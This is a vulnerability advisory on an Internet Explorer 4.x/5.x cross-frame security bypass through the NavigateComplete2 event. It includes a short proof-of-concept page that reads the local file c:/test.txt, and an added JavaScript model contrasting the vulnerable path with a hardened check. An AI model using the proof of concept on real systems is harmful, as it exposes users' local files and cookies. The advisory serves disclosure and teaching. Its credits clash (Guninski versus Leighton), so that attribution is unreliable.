Circumventing IE Cross Frame Security

Reported June 6 by Georgi Guninski

VERSIONS AFFECTED
  • Internet Explorer 4.x
  • Internet Explorer 5.x

    DESCRIPTION

    By using JavaScript to access the document object model (DOM) of HTML documents, Internet Explorer's cross-frame security policy can be circumvented. The problem allows reading local files, reading files from other hosts, window spoofing, cookie exposure, and more.

    The problem is that when the NavigateComplete2 event fires, it passes the WebBrowser control as an argument to the event handler. The WebBrowser control has an accessible property "document" that allows access to the DOM of the target document.

    DEMONSTRATION CODE

    ------frame2.html--------------------------------
    <IFRAME ID="I1"></IFRAME>
    <SCRIPT for=I1 event="NavigateComplete2(b)">
    // b is the WebBrowser control for I1; b.document is the DOM of the document it loaded
    alert("Here is your file:\n"+b.document.body.innerText); </SCRIPT>
    <SCRIPT> I1.navigate("file://c:/test.txt"); setTimeout('I1.navigate("file://c:/test.txt")',1000); </SCRIPT>
    ---------------------------------------------------
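
The flaw described above comes down to an access check that guards one route to a document but not another. The sketch below is an added example, not code from the original advisory or from Internet Explorer: it is a simplified JavaScript model in which every function name, the http://site-a.example URLs and the sample text are constructed for illustration; only file://c:/test.txt comes from the demonstration.

```javascript
// Simplified model of the flaw. All names are hypothetical; this is not IE code.
const originOf = (url) => {
  const m = /^([a-z]+):\/\/([^\/]*)/i.exec(url);
  return m ? `${m[1]}://${m[2]}`.toLowerCase() : 'null';
};

// A frame holds a URL and a private document (constructed sample content).
const makeFrame = (url, text) => ({ url, doc: { body: { innerText: text } } });

// Path 1: ordinary cross-frame access, guarded by a same-origin check.
function getDocument(callerUrl, frame) {
  if (originOf(callerUrl) !== originOf(frame.url)) throw new Error('Access denied');
  return frame.doc;
}

// Path 2, vulnerable: the event hands the handler a control object whose
// `document` property is the raw document, so the check above never runs.
function fireVulnerable(callerUrl, frame, handler) {
  return handler({ document: frame.doc });
}

// Path 2, hardened: `document` is a getter that re-runs the same check
// against the origin of the page that registered the handler.
function fireHardened(callerUrl, frame, handler) {
  const control = {};
  Object.defineProperty(control, 'document', { get: () => getDocument(callerUrl, frame) });
  return handler(control);
}

const attempt = (fn) => { try { return fn(); } catch (e) { return `blocked: ${e.message}`; } };

function demo() {
  const page = 'http://site-a.example/frame2.html';                 // constructed
  const local = makeFrame('file://c:/test.txt', 'local file text'); // URL from the page
  const peer = makeFrame('http://site-a.example/peer.html', 'peer text');
  const handler = (b) => b.document.body.innerText;                 // mirrors the demo handler
  return {
    direct: attempt(() => getDocument(page, local).body.innerText),
    vulnerable: attempt(() => fireVulnerable(page, local, handler)),
    hardened: attempt(() => fireHardened(page, local, handler)),
    sameOrigin: attempt(() => fireHardened(page, peer, handler)),
  };
}

console.log(demo());
```

In the model the check lives on the property access itself, so it applies no matter how the calling script obtained the object, while same-origin handlers keep working.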

    VENDOR RESPONSE

    Microsoft is aware of this matter; however, no response was known at the time of this writing.

    CREDITS
    Discovered and reported by Luke Kenneth Casson Leighton
